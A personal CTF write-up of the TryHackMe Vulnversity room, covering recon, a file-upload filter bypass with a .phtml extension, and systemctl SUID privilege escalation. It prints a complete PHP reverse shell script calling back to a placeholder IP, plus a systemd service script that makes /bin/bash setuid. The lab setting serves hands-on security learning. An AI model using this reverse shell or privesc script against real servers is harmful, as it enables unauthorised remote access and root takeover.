TryHackMe CTF: Vulnversity — Walkthrough

Hola Suyog aka xspatrian here!. I just hacked Vulneversity machine on TryHackMe. After completing the machine That time consuming learning time forced me to write this writeup. As all hackers I’m also learning from my mistakes . if you have any doubt just come to my

website

This room is based on basic learning related to reconnaissance, web app attacks, and simple privilege escalation.

Reconnaissance:

The first thing to do after deploying machine is the Recon phase.so fired up Nmap to scan the ports and detect the what services are running on the server.

command : nmap ip -A

The “nmap ip -A” command provides detailed information about a target’s network services, operating system, and versions. It reveals open ports, potentially vulnerable services, and their versions. Additionally, it performs OS detection, identifying the operating system running on the target.

We found out at port 3333 is open and http is running on it .

As you see in the image there is website hosted on port 3333. after using every feature nothing found. Then I decided to find hidden directories.

So I used gobuster

command : gobuster dir -u http://MACHINE_IP:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

I’ve used default wordlist from /usr/share/wordlist/dirbuster/directory-list-1.0.txt

As you see in image I got the Internal hidden directory at /internal

The file upload functionality is here so let’s try php file upload.

File upload Vulnerability: Straight forward File upload Vulnerability is like we will upload php file on server which contains out host ip and port number to hack into server and take server’s full access.

so I went on google and searched reverse shell script .

the full reverse shell script:

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.10.10';
$port = 9001;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}

?>

as in image we have to change ip and port number according to host machine to take server’s shell.

but while uploading file .php extension was not allowed. so we have to think out of box.

.php
.php3
.php4
.php5
.phtml

among these extension .phtml is uploaded sucessfully.

now we have to further enumerate directory of /internal

we got /uploads directory.

As you see our php-reverse-shell.phtml uploaded sucessfully on server.

Now our Target is to make a connection with this script and try to take shell of server.

so Started netcat server on port 443 .

now we have to click on the file which is uploaded on server called php-reverse-shell.phtml

Now our next goal to do privilege escalation on that server and take root access

for privilege escalation I used this command to check SUID.

$ find / -perm -u=s -type f 2>/dev/nullfind: a Linux command to search for files in a directory hierarchy-perm: is used to define the permissions to search for-u=s: search for files with the SUID permission-type f: search for regular file2>dev/null: errors will be deleted automatically

And I got /bin/systemctl this

“/bin/systemctl” is a command-line utility used for controlling system services in Linux distributions. It allows users to start, stop, restart, enable, disable, and manage various system services. This utility is often used by administrators to manage the system’s state and configure service behavior. It plays a crucial role in the initialization, management, and maintenance of the Linux operating system.

Now our path is clear to privilege escalation though systemctl.

so I’ve serached on

now I have to run this script on the server terminal to escalate as a root user.

After getting shell use this to make shell stable :

python -c ‘import pty; pty.spawn(“/bin/bash”)’

now we have to take root access so run the script.

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

The script explaination:

This script creates a systemd service file that sets the setuid bit on /bin/bash, links it to systemd, and then enables and starts the service immediately. This action allows users to execute /bin/bash with elevated privileges. However, this has severe security implications and should be approached with caution.

when we got server shell terminal has $ which represent normal user.

now if you look at the end of image terminal has # which represents root user.

As this we finely take over full server access.

now we can do any this with website which a hacker can think.

This is the final ethical stage .

we we do anything further maybe FBI will come to your door.

Thats all guyzzzz at some point I also take help by reading articles and watching videos. hacking journey is a lifelong journey you’ll learn by mistakes and practice.

If you liked this article give a clap and follow we on linkdin.

or visit my website

Feel free to dm me!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!